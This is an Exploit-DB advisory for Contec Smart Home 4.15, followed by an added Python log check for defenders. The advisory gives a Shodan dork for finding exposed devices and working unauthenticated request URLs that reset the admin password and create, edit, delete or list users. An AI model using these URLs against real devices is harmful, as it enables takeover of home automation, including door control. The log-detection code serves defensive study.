Contec Smart Home 4.15 - Unauthorized Password Reset

EDB-ID: 44295
Author: Z3ro0ne
Published: 2018-03-16
CVE: N/A
Type: Webapps
Platform: Hardware
Vulnerable App: N/A

# Shodan Dork : "content/smarthome.php"
# Vendor Homepage : http://contec.co.il
# Tested on : Google Chrome
# Tested version : 4.15
# Date : 2018-03-14
# Author : Z3ro0ne
# Contact : [email protected]
# Facebook Page : https://www.facebook.com/Z3ro0ne

# Vulnerability description :
The vulnerability allows an unauthenticated attacker to remotely bypass authentication, change the admin password without knowing the old password, and control connected devices (lamps, doors, air conditioner...).


# Exploit

To Reset Admin password
http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1

To Create a new user
http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1

To edit a user
http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1

To Delete a user
http://Ipaddress:port/content/delete_user.php?user_name=USER

Users list
http://Ipaddress:port/content/user.php
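
For defenders, an added example (not part of the original advisory or the vendor's code): a Python check that flags logged requests to the user-management endpoints listed above and records whether a password travelled in the URL. It assumes a reverse proxy in front of the device writes combined-format access logs; the function name, the `trusted_sources` parameter and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the advisory, mapped to a label for the action.
ENDPOINTS = {
    "/content/new_user.php": "create-user-or-reset-password",
    "/content/edit_user.php": "edit-user",
    "/content/delete_user.php": "delete-user",
    "/content/user.php": "list-users",
}

# Assumption: combined log format, written by a reverse proxy in front of the device.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_user_mgmt_requests(lines, trusted_sources=frozenset()):
    """Return one finding per logged request to a user-management endpoint."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        action = ENDPOINTS.get(url.path.lower())
        if action is None:
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        findings.append({
            "src": m["src"],
            "time": m["ts"],
            "action": action,
            "status": int(m["status"]),
            "user_name": qs.get("user_name", [None])[0],
            "group_id": qs.get("group_id", [None])[0],
            # Record only that a password travelled in the URL, never its value.
            "password_in_url": "password" in qs,
            "trusted_source": m["src"] in trusted_sources,
        })
    return findings

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Mar/2018:10:01:02 +0000] "GET /content/user.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [14/Mar/2018:10:01:09 +0000] "GET /content/new_user.php?user_name=ADMIN&password=EXAMPLE&group_id=1 HTTP/1.1" 200 64 "-" "-"',
    '192.0.2.10 - - [14/Mar/2018:10:05:00 +0000] "GET /content/smarthome.php HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.10 - - [14/Mar/2018:10:06:30 +0000] "GET /content/delete_user.php?user_name=guest HTTP/1.1" 200 32 "-" "-"',
]
```

A finding with `password_in_url` set means the credential is also sitting in the proxy log itself, so the affected account's password should be changed and the log treated as sensitive.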
